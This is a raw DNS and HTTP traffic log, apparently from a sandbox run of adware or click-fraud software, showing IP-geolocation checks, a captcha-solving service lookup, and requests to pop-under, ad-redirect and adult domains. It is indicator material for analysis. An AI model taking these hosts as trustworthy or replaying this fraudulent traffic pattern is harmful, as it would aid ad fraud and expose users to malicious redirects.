DNSgo.hpyjmp.comRequestgo.hpyjmp.comIN AResponsego.hpyjmp.comIN A172.67.214.16go.hpyjmp.comIN A104.21.77.251
-
DNSkofirusy.proRequestkofirusy.proIN AResponsekofirusy.proIN A88.85.94.228
-
DNSbaide.aa.amRequestbaide.aa.amIN AResponsebaide.aa.amIN A212.107.18.203
-
DNSkofirusy.proRequestkofirusy.proIN AResponsekofirusy.proIN A88.85.94.228
-
DNScam4-static.xcdnpro.comRequestcam4-static.xcdnpro.comIN AResponsecam4-static.xcdnpro.comIN CNAMEcam4-static.xcdnpro.com.sds.rncdn7.comcam4-static.xcdnpro.com.sds.rncdn7.comIN A64.210.158.68cam4-static.xcdnpro.com.sds.rncdn7.comIN A64.210.158.70cam4-static.xcdnpro.com.sds.rncdn7.comIN A64.210.158.72
-
DNStaskthesa.clubRequesttaskthesa.clubIN AResponsetaskthesa.clubIN A13.227.222.62taskthesa.clubIN A13.227.222.98taskthesa.clubIN A13.227.222.43taskthesa.clubIN A13.227.222.74
-
DNSotheredan.spaceRequestotheredan.spaceIN AResponseotheredan.spaceIN A13.226.155.119otheredan.spaceIN A13.226.155.8otheredan.spaceIN A13.226.155.72otheredan.spaceIN A13.226.155.74
-
DNSmaswo.ruRequestmaswo.ruIN AResponsemaswo.ruIN A212.107.18.203
-
GEThttp://maswo.ru/adv.htmlRequestGET /adv.html HTTP/1.1
Host: maswo.ru
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 403 Forbidden
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: 0
Server: BitNinja Captcha Server
Date: Mon, 06 Sep 2021 09:49:29 GMT
Content-Length: 57786
Connection: close
-
POSThttp://baide.aa.am/ung.phpRequestPOST /ung.php HTTP/1.1
Host: baide.aa.am
Connection: keep-alive
Content-Length: 1
Cache-Control: max-age=0
Origin: null
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://toptraffic.site/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 403 Forbidden
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: 0
Server: BitNinja Captcha Server
Date: Mon, 06 Sep 2021 09:49:29 GMT
Content-Length: 57785
Connection: close
-
GEThttp://otheredan.space/popunder.gifRequestGET /popunder.gif HTTP/1.1
Host: otheredan.space
Connection: keep-alive
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: image/webp,image/apng,image/*,*/*;q=0.8
Referer: http://68porn.com/goto.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
-
DNSip-api.comRequestip-api.comIN AResponseip-api.comIN A208.95.112.1
-
GEThttp://ip-api.com/csv/?fields=countryCodeRequestGET /csv/?fields=countryCode HTTP/1.1
Host: ip-api.com
Connection: keep-alive
Accept-Encoding: gzip,deflate
ResponseHTTP/1.1 200 OK
Date: Mon, 06 Sep 2021 09:49:28 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 3
Access-Control-Allow-Origin: *
X-Ttl: 58
X-Rl: 43
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.40.55lumtest.comIN A3.94.72.89
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Connection: close
Host: lumtest.com
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:49:29 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.40.55lumtest.comIN A3.94.72.89
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.40.55lumtest.comIN A3.94.72.89
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:49:30 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:49:30 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNSsecure.quantserve.comRequestsecure.quantserve.comIN AResponsesecure.quantserve.comIN CNAME2kpixel.quantserve.com2kpixel.quantserve.comIN CNAMEglobal.px.quantserve.comglobal.px.quantserve.comIN A192.184.69.139global.px.quantserve.comIN A192.184.69.143global.px.quantserve.comIN A192.184.69.141global.px.quantserve.comIN A192.184.69.193global.px.quantserve.comIN A192.184.69.152global.px.quantserve.comIN A192.184.69.146global.px.quantserve.comIN A192.184.69.231global.px.quantserve.comIN A192.184.69.149
-
DNSapi.ipify.orgRequestapi.ipify.orgIN AResponseapi.ipify.orgIN CNAMEnagano-19599.herokussl.comnagano-19599.herokussl.comIN CNAMEelb097307-934924932.us-east-1.elb.amazonaws.comelb097307-934924932.us-east-1.elb.amazonaws.comIN A54.235.88.121elb097307-934924932.us-east-1.elb.amazonaws.comIN A23.21.76.7elb097307-934924932.us-east-1.elb.amazonaws.comIN A54.225.219.20elb097307-934924932.us-east-1.elb.amazonaws.comIN A50.16.235.219elb097307-934924932.us-east-1.elb.amazonaws.comIN A50.16.239.65elb097307-934924932.us-east-1.elb.amazonaws.comIN A50.16.216.118elb097307-934924932.us-east-1.elb.amazonaws.comIN A23.21.173.155elb097307-934924932.us-east-1.elb.amazonaws.comIN A50.17.226.156
-
GEThttp://api.ipify.org/RequestGET / HTTP/1.1
Host: api.ipify.org
Connection: keep-alive
Accept-Encoding: gzip,deflate
ResponseHTTP/1.1 200 OK
Server: Cowboy
Connection: keep-alive
Content-Type: text/plain
Vary: Origin
Date: Mon, 06 Sep 2021 09:49:31 GMT
Content-Length: 12
Via: 1.1 vegur
-
DNSmedia.go2speed.orgRequestmedia.go2speed.orgIN AResponsemedia.go2speed.orgIN A13.227.222.28media.go2speed.orgIN A13.227.222.57media.go2speed.orgIN A13.227.222.10media.go2speed.orgIN A13.227.222.98
-
DNSwww.google.nlRequestwww.google.nlIN AResponsewww.google.nlIN A142.251.36.3
-
DNSs.amazon-adsystem.comRequests.amazon-adsystem.comIN AResponses.amazon-adsystem.comIN A209.54.176.128
-
GEThttp://mobileoffcpi.com/gooffer.php?aff_id=123&id_offer=3661&gaid=1a636c1a-536f-44a1-aa8e-e0d9edf864bd&may=89RequestGET /gooffer.php?aff_id=123&id_offer=3661&gaid=1a636c1a-536f-44a1-aa8e-e0d9edf864bd&may=89 HTTP/1.1
Host: mobileoffcpi.com
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Linux; Android 9; Pixel 2 XL Build/PQ1A.181105.017.A1) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/85.0.4183.101 Mobile Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
X-Requested-With: com.android.chrome
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
ResponseHTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Mon, 06 Sep 2021 09:49:34 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Location: https://track.adxmel.com/aff_c?aid=1136301&oid=200580&aff_sub=3XiqYkZnge8bxNVc2BzjWa6vlGHf4T&advid=1a636c1a-536f-44a1-aa8e-e0d9edf864bd&source=452
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
-
DNStaskthesa.clubRequesttaskthesa.clubIN AResponsetaskthesa.clubIN A13.227.222.62taskthesa.clubIN A13.227.222.74taskthesa.clubIN A13.227.222.98taskthesa.clubIN A13.227.222.43
-
DNSlangmm.infoRequestlangmm.infoIN AResponselangmm.infoIN A5.181.218.143
-
POSThttp://langmm.info/a.phpRequestPOST /a.php HTTP/1.1
Host: langmm.info
Connection: keep-alive
Content-Length: 65
Cache-Control: max-age=0
Origin: http://langmm.info
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://langmm.info/a.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 403 Forbidden
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: 0
Server: BitNinja Captcha Server
Date: Mon, 06 Sep 2021 09:49:34 GMT
Content-Length: 57783
Connection: close
-
GEThttp://taskthesa.club/ODBmWk1ZUgU3clkNBHw4Slxbf39+FVQcKQlVEGJ7DkUELXQIU1B0LlRfEz4rSl8ILmNWVRJ/f359BB8hCGQgDx1yWAkrLFBXAR8FfkM+aTl9VCEMBnFHBTACQEhWCn5fUiwyfWpyJWosf3Ivf39+aQwyO3l0PyIYYHY1EwlpcyoxIUl9JxM8a2hXIAlrADE5Gn57NgscUmAKH3V/WQEtDlFxBxEZfns2GBtAfycXN3BjJ28Jb0ghGSB6cwMMCx0CJAAYaVsgCXUAcQxqL2hKVxAoUmoWAHxPVyEwKk9xISIKXnQBFAZUdkNoD2JhK2wYYAUKHApAdwAdH1t2DXcbHQIgGSEBVzMCeFR0MjEIcXQnOAF6aQgKD1BDND09X2hVbyxeAigQKAhiDQoqaQkhCQ9PaAEqH15dMxsEeggWOQsNBSMjJgpyHwApWWcCOQZQR0NoD3dXIykYYAQyDX5QUQASOV5WIxR9XQEwIhhgBQoSNF9jKgkuflIjAwZhdl9/f3pnCGMna1oeEGtSQwk0PQV7UhQHbFUuIjtpVhVtGQRequestGET /ODBmWk1ZUgU3clkNBHw4Slxbf39+FVQcKQlVEGJ7DkUELXQIU1B0LlRfEz4rSl8ILmNWVRJ/f359BB8hCGQgDx1yWAkrLFBXAR8FfkM+aTl9VCEMBnFHBTACQEhWCn5fUiwyfWpyJWosf3Ivf39+aQwyO3l0PyIYYHY1EwlpcyoxIUl9JxM8a2hXIAlrADE5Gn57NgscUmAKH3V/WQEtDlFxBxEZfns2GBtAfycXN3BjJ28Jb0ghGSB6cwMMCx0CJAAYaVsgCXUAcQxqL2hKVxAoUmoWAHxPVyEwKk9xISIKXnQBFAZUdkNoD2JhK2wYYAUKHApAdwAdH1t2DXcbHQIgGSEBVzMCeFR0MjEIcXQnOAF6aQgKD1BDND09X2hVbyxeAigQKAhiDQoqaQkhCQ9PaAEqH15dMxsEeggWOQsNBSMjJgpyHwApWWcCOQZQR0NoD3dXIykYYAQyDX5QUQASOV5WIxR9XQEwIhhgBQoSNF9jKgkuflIjAwZhdl9/f3pnCGMna1oeEGtSQwk0PQV7UhQHbFUuIjtpVhVtGQ HTTP/1.1
Host: taskthesa.club
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://68porn.com/goto.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: csu=4d487097-1782-4c4f-8182-7ad948b436e4
-
DNSs3.amazonaws.comRequests3.amazonaws.comIN AResponses3.amazonaws.comIN A52.216.112.150
-
DNSs3.amazonaws.comRequests3.amazonaws.comIN AResponses3.amazonaws.comIN A3.5.7.124
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9adserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160adserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49
-
DNSs3.amazonaws.comRequests3.amazonaws.comIN AResponses3.amazonaws.comIN A52.217.71.238
-
DNSwww.google.nlRequestwww.google.nlIN AResponsewww.google.nlIN A142.251.36.3
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.40.55lumtest.comIN A3.94.72.89
-
DNSencrypted-tbn1.gstatic.comRequestencrypted-tbn1.gstatic.comIN AResponseencrypted-tbn1.gstatic.comIN A142.250.179.174
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:49:36 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNSaigneloa.comRequestaigneloa.comIN AResponseaigneloa.comIN A139.45.197.250
-
DNSaccounts.google.comRequestaccounts.google.comIN AResponseaccounts.google.comIN A172.217.168.237
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.40.55lumtest.comIN A3.94.72.89
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:49:40 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNSlangke.funRequestlangke.funIN AResponselangke.funIN A212.107.18.203
-
DNSfreychang.funRequestfreychang.funIN AResponsefreychang.funIN A104.21.45.207freychang.funIN A172.67.218.221
-
DNSkofirusy.proRequestkofirusy.proIN AResponsekofirusy.proIN A88.85.94.228
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49adserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9adserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160
-
DNScdn18383040.ahacdn.meRequestcdn18383040.ahacdn.meIN AResponsecdn18383040.ahacdn.meIN A213.174.135.24cdn18383040.ahacdn.meIN A213.174.135.25
-
DNStopjav.ruRequesttopjav.ruIN AResponsetopjav.ruIN A167.86.103.60
-
DNSicotrack.netRequesticotrack.netIN AResponseicotrack.netIN A109.206.168.17
-
DNStcb.pushic.comRequesttcb.pushic.comIN AResponsetcb.pushic.comIN A116.202.204.4tcb.pushic.comIN A88.198.182.68
-
GEThttp://alfad.pro/go/266933/626194RequestGET /go/266933/626194 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: text/html
Date: Mon, 06 Sep 2021 09:49:41 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 271
Connection: keep-alive
-
GEThttp://langke.fun/ads.htmlRequestGET /ads.html HTTP/1.1
Host: langke.fun
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.62 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 403 Forbidden
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: 0
Server: BitNinja Captcha Server
Date: Mon, 06 Sep 2021 09:49:41 GMT
Content-Length: 57786
Connection: close
-
GEThttp://topjav.ru/adv.phpRequestGET /adv.php HTTP/1.1
Host: topjav.ru
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.119 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:49:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.40.55lumtest.comIN A3.94.72.89
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.40.55lumtest.comIN A3.94.72.89
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.40.55lumtest.comIN A3.94.72.89
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:49:42 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:49:42 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:49:42 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNSapi.ipify.orgRequestapi.ipify.orgIN AResponseapi.ipify.orgIN CNAMEnagano-19599.herokussl.comnagano-19599.herokussl.comIN CNAMEelb097307-934924932.us-east-1.elb.amazonaws.comelb097307-934924932.us-east-1.elb.amazonaws.comIN A54.235.88.121elb097307-934924932.us-east-1.elb.amazonaws.comIN A23.21.76.7elb097307-934924932.us-east-1.elb.amazonaws.comIN A54.225.219.20elb097307-934924932.us-east-1.elb.amazonaws.comIN A50.16.235.219elb097307-934924932.us-east-1.elb.amazonaws.comIN A50.16.239.65elb097307-934924932.us-east-1.elb.amazonaws.comIN A50.16.216.118elb097307-934924932.us-east-1.elb.amazonaws.comIN A23.21.173.155elb097307-934924932.us-east-1.elb.amazonaws.comIN A50.17.226.156
-
DNSupdate.googleapis.comRequestupdate.googleapis.comIN AResponseupdate.googleapis.comIN A142.250.179.195
-
GEThttp://api.ipify.org/RequestGET / HTTP/1.1
Host: api.ipify.org
Connection: keep-alive
Accept-Encoding: gzip,deflate
ResponseHTTP/1.1 200 OK
Server: Cowboy
Connection: keep-alive
Content-Type: text/plain
Vary: Origin
Date: Mon, 06 Sep 2021 09:49:43 GMT
Content-Length: 12
Via: 1.1 vegur
-
DNSaigneloa.comRequestaigneloa.comIN AResponseaigneloa.comIN A139.45.197.250
-
DNSmonitor.capmonster.appRequestmonitor.capmonster.appIN AResponsemonitor.capmonster.appIN A104.26.3.167monitor.capmonster.appIN A104.26.2.167monitor.capmonster.appIN A172.67.75.150
-
DNSmy.rtmark.netRequestmy.rtmark.netIN AResponsemy.rtmark.netIN A139.45.195.8
-
DNSjs-agent.newrelic.comRequestjs-agent.newrelic.comIN AResponsejs-agent.newrelic.comIN CNAMEnewrelic.map.fastly.netnewrelic.map.fastly.netIN A151.101.1.27newrelic.map.fastly.netIN A151.101.65.27newrelic.map.fastly.netIN A151.101.129.27newrelic.map.fastly.netIN A151.101.193.27
-
DNSwww.locked1.comRequestwww.locked1.comIN AResponsewww.locked1.comIN CNAMElocked1.comlocked1.comIN A3.225.87.211
-
DNSrecaptcha.netRequestrecaptcha.netIN AResponserecaptcha.netIN A216.58.208.99
-
DNSmasde.infoRequestmasde.infoIN AResponsemasde.infoIN A212.107.18.203
-
DNSap.lijit.comRequestap.lijit.comIN AResponseap.lijit.comIN CNAMEvap.lijit.comvap.lijit.comIN CNAMEemeas.vap.lijit.comemeas.vap.lijit.comIN CNAMEoeu.vap.lijit.comoeu.vap.lijit.comIN A72.251.249.13oeu.vap.lijit.comIN A72.251.249.9oeu.vap.lijit.comIN A216.52.2.39oeu.vap.lijit.comIN A216.52.2.48oeu.vap.lijit.comIN A216.52.2.30oeu.vap.lijit.comIN A72.251.249.14oeu.vap.lijit.comIN A216.52.2.19
-
DNStxxx.ukRequesttxxx.ukIN AResponsetxxx.ukIN A167.86.121.34
-
DNStcb.pushic.comRequesttcb.pushic.comIN AResponsetcb.pushic.comIN A88.198.182.68tcb.pushic.comIN A116.202.204.4
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9adserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160adserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49
-
DNSmasde.infoRequestmasde.infoIN AResponsemasde.infoIN A212.107.18.203
-
DNSwww.highperformancecpm.comRequestwww.highperformancecpm.comIN AResponsewww.highperformancecpm.comIN A192.243.59.20www.highperformancecpm.comIN A192.243.59.12www.highperformancecpm.comIN A192.243.59.13
-
DNSlangmm.infoRequestlangmm.infoIN AResponselangmm.infoIN A5.181.218.143
-
DNSjptube.usRequestjptube.usIN AResponsejptube.usIN A167.86.121.34
-
DNSonsanothi.bizRequestonsanothi.bizIN AResponseonsanothi.bizIN A52.222.139.93onsanothi.bizIN A52.222.139.29onsanothi.bizIN A52.222.139.108onsanothi.bizIN A52.222.139.9
-
GEThttp://alfad.pro/go/266933/627541RequestGET /go/266933/627541 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.15 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: text/html
Date: Mon, 06 Sep 2021 09:49:46 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 272
Connection: keep-alive
-
GEThttp://masde.info/ads.phpRequestGET /ads.php HTTP/1.1
Host: masde.info
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 403 Forbidden
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: 0
Server: BitNinja Captcha Server
Date: Mon, 06 Sep 2021 09:49:46 GMT
Content-Length: 57785
Connection: close
-
GEThttp://txxx.uk/index.htmRequestGET /index.htm HTTP/1.1
Host: txxx.uk
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:49:45 GMT
Content-Type: text/html
Content-Length: 301
Last-Modified: Fri, 30 Jul 2021 01:05:55 GMT
Connection: keep-alive
ETag: "61035073-12d"
Accept-Ranges: bytes
-
GEThttp://jptube.us/index.htmlRequestGET /index.html HTTP/1.1
Host: jptube.us
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:49:45 GMT
Content-Type: text/html
Content-Length: 265
Last-Modified: Tue, 22 Jun 2021 05:10:57 GMT
Connection: keep-alive
ETag: "60d170e1-109"
Accept-Ranges: bytes
-
GEThttp://langmm.info/a.phpRequestGET /a.php HTTP/1.1
Host: langmm.info
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 403 Forbidden
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: 0
Server: BitNinja Captcha Server
Date: Mon, 06 Sep 2021 09:49:46 GMT
Content-Length: 57783
Connection: close
-
GEThttp://onsanothi.biz/redirect?tid=930453RequestGET /redirect?tid=930453 HTTP/1.1
Host: onsanothi.biz
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; Touch; MASMJS; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://jpxxx.vip/index.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: csu=489b3d5e-7541-4e07-8e34-a41c76c0fa5b
ResponseHTTP/1.1 302 Found
Content-Type: text/plain
Content-Length: 0
Connection: keep-alive
Date: Mon, 06 Sep 2021 09:49:46 GMT
Server: openresty/1.17.8.2
cache-control: no-store, no-cache, must-revalidate, no-transform
Pragma: no-cache
P3P: CP="NID DSP ALL COR"
Location: http://s.optnx.com/cimp.php?data=TVRZek1Ea3lNVGM0Tm53ME5EaGtOR1k1T1dWbU5tVmhZbU15TURVNU1tWTRabU14WWpVNVpXSTJNZy0tfGh0dHBzOi8vZnVycmljaXR5LW51cnN1YmFydS54eXovOTU5OTlkYTItNmUyMS00OWIyLTk1OWMtMWNjNjk4YjY2ZGI1P3pvbmVpZD0zNTc2NDExJnNvdXJjZT1hZC1tYXZlbi5jb20mdmFyaWQ9NTg5MTkwMTQma2V5d29yZD0mdGFncz1qcHh4eCx2aXAsaW5kZXgsaHRtbCZzaXRlaWQ9ODE2MjYxJmNhbXBpZD00NTcwMDA2JmNhdGlkPTUwOCZjb3VudHJ5PVVTQSZmb3JtYXQ9JmNvc3Q9MC4wMDA1JnRhZz1vb2ROVlRIWE5IWk5IVk00NWMzVVZXVjB6VE9xdHVtdWxtcGRLNTFVdHJxWm5UT3BsZEs2VjBycXJiWFN1bGRLNlowcnBYU3VsZE02VjBycFhUWFhheTBTNmNXN1haMjhWMFo3NjFVMTUwMjZWWjdUME8wbTMwcHIyNG9uejJ6bjFvM3V6cXB6bXAzM3JuMzNvMWRkUkxUVlE3d1NsS2pSMkp6blN1bGRLNmFaMHJwWFN1bGRLNFBzfGh0dHB8MTU0LjYxLjcxLjUxfFVTQXw0MXxhZC1tYXZlbi5jb218NTMxMjk0fDQzMDY3NXw4MTYyNjF8MzU3NjQxMXw1MDh8NDU3MDAwNnw1ODkxOTAxNHw0MHwxfDB8MHw1ODh8OTMwNDUzfDUwfDc1fFVTRHxVU0R8MXwxfDIyfHwxfFVTQXx8MTB8NHwwfHwxOTljMDMwYmY4ZDlhOGY2M2FlYzU0NmE0OGI1YWQyM3xiMWViNDZkZjMyYWRhMmMzZTlhNTRhMTRlZTYyZWUzY3wxfDB8anB4eHgudmlwfDB8MHwwfDAuMXwxfDB8ZXhjaGFuZ2VfbGlua3wwfDB8MHwtMXwwfDB8fHwyfDcyMHx8MHwwfDB8MTF8MHwwfDF8MHxPS3xmYzBmZDMwMzA1MWNkM2NiNTEzZmFiOWQxZWNhZWVmYg--
X-Cache: Miss from cloudfront
Via: 1.1 415e8d76bf2c69e5e03b89ba8461cd7e.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: AMS50-C1
